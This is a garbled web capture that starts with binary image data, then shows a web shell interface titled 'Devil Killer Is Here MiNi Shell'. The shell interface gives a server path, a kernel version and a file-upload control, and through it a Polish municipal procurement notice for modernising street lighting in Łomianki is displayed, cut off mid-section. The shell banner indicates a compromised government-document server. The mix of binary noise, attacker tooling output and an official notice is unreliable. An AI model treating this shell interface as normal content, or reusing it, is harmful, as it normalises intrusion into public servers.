JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220318/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220318/0009085201-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> &#34;Modernizacja oświetlenia ulicznego w Gminie Łomianki w formule partnerstwa publiczno-prywatnego&#34;. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Łomianki</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">NIP 1181768394</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Warszawska 115</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Łomianki</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">05-092</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL913 - Warszawski zachodni</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">22 888 98 05</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">um@poczta.lomianki.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.lomianki.pl/bip/zamowienia-publiczne/lista-postepowan-2022</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> &#34;Modernizacja oświetlenia ulicznego w Gminie Łomianki w formule partnerstwa publiczno-prywatnego&#34;. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-2927cc8a-a5cf-11ec-baa2-b6d934483bfb</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00090852</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-03-18</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00045175/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.17 Modernizacja infrastruktury oświetleniowej na terenie Gminy Łomianki oraz budowa nowego oświetlenia dróg i placów gminnych - zad . 2015/18</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Zamawiający wskazuje, że obecnie zamówienie nie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej, jednakże Zamawiający jest w trakcie starania się o pozyskanie takich środków. Informacja o ich otrzymaniu zostanie przekazana Wykonawcom najpóźniej wraz z zaproszeniem do składania ofert ostatecznych. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 3 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/lomianki <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/lomianki</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert, ofert ostatecznych, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między Zamawiającym a Wykonawcą, z uwzględnieniem wyjątków określonych w ustawie z dnia 11 września 2019 r. Pzp (t.j. Dz. U. z 2021 r. poz. 1129 ze zm.) („Ustawa Pzp”), odbywa się przy użyciu środków komunikacji elektronicznej za pośrednictwem platformy dostępnej pod adresem https://platformazakupowa.pl/pn/lomianki („Platforma”).<br/>Przez środki kom. elektr. rozumie się środki komunikacji elektronicznej zdefiniowane w ustawie z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (t.j. Dz. U. z 2020 r. poz. 344 ze zm.).<br/>Ofertę, ofertę ostateczną, oświadczenia o których mowa w art. 125 ust. 1 Ustawy Pzp, podmiotowe środki dowodowe, pełnomocnictwa, zobowiązanie podmiotu udostępniającego zasoby sporządza się w postaci elektronicznej, w ogólnie dostępnych formatach danych, w szczególności w formatach .txt, .rtf, .pdf, .doc, .docx, .odt. i składa się pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym za pośrednictwem Platformy .<br/>Szczegółowy zakres i sposób sporządzania i przekazywania ww. dokumentów został określony w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz.U. z 2020 r., poz. 2452).<br/>Instrukcje korzystania z Platformy dotyczące w szczególności logowania, składania wniosków o wyjaśnienie treści SWZ lub opisu potrzeb i wymagań, składania ofert, ofert ostatecznych oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu Platformy („Instrukcja”) znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem: https://platformazakupowa.pl/strona/45-instrukcje<br/>Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego: <br/>1)	akceptuje warunki korzystania z platformazakupowa.pl określone w Regulaminie zamieszczonym na stronie internetowej pod linkiem w zakładce „Regulamin&#34; oraz uznaje go za wiążący,<br/>2)	zapoznał i stosuje się do Instrukcji.<br/>Zamawiający nie ponosi odpowiedzialności za złożenie oferty lub oferty ostatecznej w sposób niezgodny z Instrukcją, w szczególności za sytuację, gdy Zamawiający zapozna się z treścią oferty lub oferty ostatecznej przed upływem terminu składania ofert (np. złożenie oferty w zakładce „Wyślij wiadomość do Zamawiającego”). Taka oferta nie będzie brana pod uwagę w przedmiotowym postępowaniu. Prawidłowo przekazywany przez Wykonawcę plik zawierający ofertę jest zaszyfrowany przez Platformę bez możliwości jego otwarcia przez Zamawiającego przed upływem terminu składania ofert.<br/>Zgodnie z 67 Ustawy Pzp, Zamawiający podaje wymagania techniczne związane z korzystaniem z Platformy:<br/>stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2<br/>GHZ lub jego nowsza wersja, jeden z systemów operacyjnych -<br/>MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10 0.,<br/>włączona obsługa JavaScript,<br/>zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plik0w .pdf,<br/>Platforma działa według standardu przyjętego w komunikacji sieciowej - kodowanie UTF8,<br/>Oznaczenie czasu odbioru danych przez Platformę stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z zegarem GUM. Za datę przekazania oświadczeń lub dokumentów przyjmuje się datę i godzinę zarejestrowania ich na Platformie po stronie Zamawiającego.<br/>Platforma umożliwia jednorazowe przesłanie plików o łącznej wielkości nieprzekraczającej 500mb.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 z dnia 4 maja 2016 r., str. 1; zwanym dalej „RODO”) informujemy, że:<br/>1.	administratorem danych osobowych Wykonawcy (Podwykonawcy lub podmiotu trzeciego) jest Gmina Łomianki, reprezentowana przez Burmistrza Łomianek z siedzibą w Łomiankach, przy ul. Warszawskiej 115, 05-092 Łomianki, telefon: 22 888 98 05 adres e-mail: um@poczta.lomianki.pl, <br/>2.	kontakt z Inspektorem Ochrony Danych osobowych w Urzędzie Miejskim <br/>w Łomiankach można uzyskać pod adresem e-mail: iod@poczta.lomianki.pl, <br/>3.	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego, prowadzonym w podstawowym na zgodnie z art. 275 pkt 3 Ustawy Pzp,<br/>4.	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 Ustawy Pzp,<br/>5.	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 Ustawy Pzp przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy,<br/>6.	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisanych Ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego,<br/>7.	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RZP.271.10.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.3.) Opis potrzeb Zamawiającego</h3><span class="normal">Przedsięwzięcie zakłada modernizację infrastruktury oświetleniowej. <br/>Zamawiający wstępnie zakłada, że modernizacja infrastruktury oświetleniowej obejmować będzie: <br/>(a)	wymianę istniejących opraw oświetlenia ulicznego na nowoczesne energooszczędne lampy typu LED, <br/>(b)	wymianę wysięgników na istniejących słupach,<br/>(c)	montaż systemu sterowania oświetleniem do nowych opraw LED oraz dostosowanie i włączenie do systemu istniejących opraw LED,<br/>(d)	wdrożenie i zarządzanie systemem sterowania oświetleniem w celu osiągnięcia efektu obniżenia zużycia energii elektrycznej, obniżenia kosztów eksploatacji, monitoringu zużycia energii elektrycznej przez instalację oświetlenia ulicznego.<br/>Zgodnie z założeniami Zamawiającego Wykonawca będzie odpowiedzialny zarówno za modernizację infrastruktury oświetleniowej, jak i utrzymanie prawidłowego stanu technicznego i bezpieczne funkcjonowanie infrastruktury oświetleniowej oraz wygenerowanie oszczędności wynikających z wymiany istniejących opraw i źródeł światła na energooszczędne.</span> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45316110-9 - Instalowanie urządzeń oświetlenia drogowego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45000000-7 - Roboty budowlane</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45231400-9 - Roboty budowlane w zakresie budowy linii energetycznych</p> <p class="mb-0">45232000-2 - Roboty pomocnicze w zakresie rurociągów i kabli</p> <p class="mb-0">45233252-0 - Roboty w zakresie nawierzchni ulic</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45311000-0 - Roboty w zakresie okablowania oraz instalacji elektrycznych</p> <p class="mb-0">45316100-6 - Instalowanie urządzeń oświetlenia zewnętrznego</p> <p class="mb-0">71000000-8 - Usługi architektoniczne, budowlane, inżynieryjne i kontrolne</p> <p class="mb-0">71314200-4 - Usługi zarządzania energią</p> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <p class="mb-0">71355000-1 - Usługi pomiarowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">132 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium kosztu oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koszt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">1</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Oszczędności w zużyciu energii elektrycznej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">2</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji robót budowlanych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">3</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	Zamawiający określa następujące warunki udział w postępowaniu w odniesieniu do sytuacji ekonomicznej lub finansowej:<br/>a)	posiada środki finansowe lub zdolność kredytową w wysokości nie niższej niż 5 000 000,00 zł (lub równowartość w innej walucie);<br/>oraz<br/>b)	posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę co najmniej 5 000 000, 00 zł (lub równowartość w innej walucie).<br/>2.	Zamawiający określa następujące warunki udział w postępowaniu w odniesieniu do zdolności technicznej lub zawodowej:<br/>a)	w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, Partner Prywatny zrealizował dwa przedsięwzięcia (każde w ramach jednej umowy), które polegały na zaprojektowaniu oraz remoncie, budowie, przebudowie lub modernizacji (wymiana opraw oświetleniowych) co najmniej 1700 opraw oświetlenia ulicznego każde z nich (tzw. system zaprojektuj i wybuduj). Prace zrealizowane w ramach wykazywanego przedsięwzięcia powinny obejmować również wymianę lub dobudowę słupów oraz linii zasilających<br/>oraz<br/>b)	w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, Partner Prywatny zrealizował dwie usługi trwające nieprzerwanie co najmniej 12 miesięcy każda, polegające na utrzymaniu technicznym minimum dwóch inwestycji obejmujących co najmniej 1700 opraw oświetlenia ulicznego (każde w ramach osobnej umowy). Przez utrzymanie techniczne należy rozumieć wykonywanie w sposób ciągły usługi polegającej na realizacji czynności związanych z utrzymaniem technicznym infrastruktury oświetleniowej, obejmującej jej bieżącą konserwację, remonty i naprawy gwarantujące jej zachowanie w stanie niepogorszonym i umożliwiające korzystanie z niej zgodnie z przeznaczeniem, w tym identyfikowanie stanów awaryjnych. Poprzez utrzymanie techniczne nie rozumie się wykonywania ww. czynności wyłącznie w przypadku zgłoszenia uprawnień inwestora z tytułu gwarancji bądź rękojmi w odniesieniu do poprzednio wykonanych robót budowlanych<br/>oraz<br/>c)	dysponuje lub będzie dysponował w okresie przewidzianym na realizację przedsięwzięcia osobami posiadającymi odpowiednie kwalifikacje zawodowe do wykonania przedmiotu zamówienia, tj. co najmniej. <br/>i.	jednym kierownikiem robót, który posiada uprawnienia (lub równoważne wystawione na podstawie obowiązujących przepisów) do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, który posiada doświadczenie nabyte w okresie ostatnich 5 lat polegające na zrealizowaniu jednej roboty budowlanej, w zakresie której była wykonana budowa systemu oświetlenia, w ramach której zmodernizowano min. 1700 opraw oświetlenia ulicznego;<br/>ii.	dwoma osobami (elektrykami) posiadającymi uprawnienia SEP do 1 KV w kategorii E, albo odpowiadające ważne uprawnienia (kwalifikacje) w zakresie eksploatacji urządzeń, instalacji i sieci elektrycznych;<br/>iii.	jedną osobą (elektrykiem) posiadającym uprawnienia SEP do 1 KV w kategorii D, albo odpowiadające ważne uprawnienia (kwalifikacje) w zakresie eksploatacji urządzeń, instalacji i sieci elektrycznych;<br/>iv.	jednym projektantem branży elektrycznej z uprawnieniami do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń.<br/>3.	Zamawiający dopuszcza łączenie uprawnień wskazanych w pkt 2. c). ii. i iii. przez jedną osobę tj. posiadanie przez jedną osobę uprawnień kat D i E.<br/>4.	Zamawiający uzna za spełnienie warunku, o którym mowa w pkt. 2 lit. c) tiret i, w przypadku wykazania przez Wykonawcę dysponowania dwoma kierownikami robót, jednym o specjalności elektrycznej oraz drugim o specjalności elektroenergetycznej, o których mowa w przedmiotowym warunku. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu znajduje się w pkt 6.7 OPiW.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu znajduje się w pkt 7 OPiW.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.	Oferta składa się z:<br/>a)	Formularza oferty (Załącznik nr 2 do Ogłoszenia);<br/>b)	Oświadczenia z art. 125 ust. 1 Ustawy Pzp (Załącznik nr 3 do Ogłoszenia); <br/>c)	Wykazu robót budowlanych, według wzoru stanowiącego Załącznik nr 4 do Ogłoszenia wraz z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie;<br/>d)	Wykazu usług, według wzoru stanowiącego Załącznik nr 5 do Ogłoszenia, z załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie;<br/>e)	Wykazu osób według wzoru stanowiącego Załącznik nr 6 do Ogłoszenia;<br/>f)	Podmiotowych środków dowodowych wskazanych w pkt 6.7.1 i 6.7.2 OPiW;<br/>g)	Oświadczenia RODO: dla wszystkich Wykonawców wspólnie ubiegających się o udział w postępowaniu, dla podmiotów trzecich, jeśli wykonawca polega na zdolnościach innych podmiotów, według wzoru stanowiącego Załącznik nr 7 do Ogłoszenia;<br/>h)	Pełnomocnictwa do reprezentowania Wykonawców wspólnie ubiegających się o udział w Postępowaniu;<br/>i)	Pełnomocnictwa do reprezentowania Wykonawcy, o ile uprawnienie do reprezentacji wykonawcy nie wynika z dokumentu rejestrowego;<br/>j)	Jeśli dotyczy – zobowiązania podmiotu do oddania do dyspozycji Wykonawcy niezbędnych zasobów na potrzeby realizacji przedsięwzięcia wraz z wymaganymi informacjami, o których mowa w pkt 6.14-6.15 OPiW, według wzoru stanowiącego Załącznik nr 8 do Ogłoszenia.<br/>2.	Załączniki do Ogłoszenia o numerach 1-8 zostały opublikowane na stronie internetowej Zamawiającego pod adresem: https://platformazakupowa.pl/pn/lomianki. Jeżeli Wykonawca przy składaniu oferty nie posługuje się udostępnionymi przez Zamawiającego formularzami, zobowiązany jest do przedłożenia dokumentów, których treść jest zgodna z treścią zawartą w ww. formularzach. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający 